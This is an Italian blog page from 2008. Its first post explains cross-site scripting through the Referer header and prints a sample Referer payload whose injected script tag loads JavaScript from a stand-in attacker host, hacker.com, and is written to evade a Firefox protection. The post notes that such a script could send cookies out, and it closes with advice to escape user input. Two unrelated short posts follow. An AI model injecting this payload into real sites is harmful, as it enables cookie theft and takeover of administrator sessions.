XSS sfruttando i referrer link

Posted by Dibi Store Wed, 13 Feb 2008 08:37:00 GMT

Molti non sanno che è possibile sfruttare la tecnica di xss anche tramite l'attributo referrer. A titolo didattico illustrerò un esempio non reale ti tale tecnica. Notate che l'url in questione può essere camuffata in diverse tecniche.

Innanzitutto l'attaccante individua una vittima e ipotizza che da qualche parte in admin ci sia una schermata di riepilogo dei referrer che hanno puntato al sito, poi crea una pagina ad hoc in qui crea un link che punti ad esempio alla home page del sito vittima, e ci clicca. In questo modo il sito vittima registrerà tale evento e verà visualizzato l'url all'amministratore. Cosa succede se però l'indirizzo del referrer è qualcosa di simile al seguente?

Referer: http://sito-cattivo.com/?<script/src="http://hacker.com/hackForIE.js
?unique=123456"src="http://hacker.com/hackForFF.js?unique=123456"></script>

In pratica questo script caricherà come sorgente il js sul sito hacker.com, tale url è stata scritta (non direttamente da me) per evitare una protezione del browser firefox. Inutile dire che dentro quel sito potrebbe esserci ad esempio un javascript che invia i cookie ad un web service predisposto per riceverli. Per ovviare al problema ricordatevi di fare un escape di tutti i dati che un utente può modificare e arrecare danno.

Posted in  | Tags  | no comments | no trackbacks

Yahoo non farlo!

Posted by Dibi Store Fri, 01 Feb 2008 14:42:00 GMT

E' notizia di oggi (ma si sapeva gia) che Microsoft vuole acquistare yahoo per 44 miliardi di dollari... Io spero che non ceda

Posted in  | 1 comment | no trackbacks

Actionscript poco performante?

Posted by Dibi Store Fri, 01 Feb 2008 10:12:00 GMT

Oggi ho avuto un problema che mi ha lasciato abbastanza perplesso, in pratica avevamo bisogno di un sistema tramite flash che ci tornasse l'url in qui era visualizzato il player (non hostato). Il problema è che appunto tramite flash è possibile sapere solo l'indirizzo dove viene ospitato il player, ma se voi tramite un embed lo visualizzate in qualsiasi altro sito, non riusciamo a saperlo.

Le soluzioni che ho trovato in rete non hanno risolto il problema, voglio ricordare che io non sono assolutamente uno sviluppatore flash tantomeno actionscript, quindi se qualcuno ha una soluzione la posti pure (ps non possiamo usare javascript.

Posted in  | no comments | no trackbacks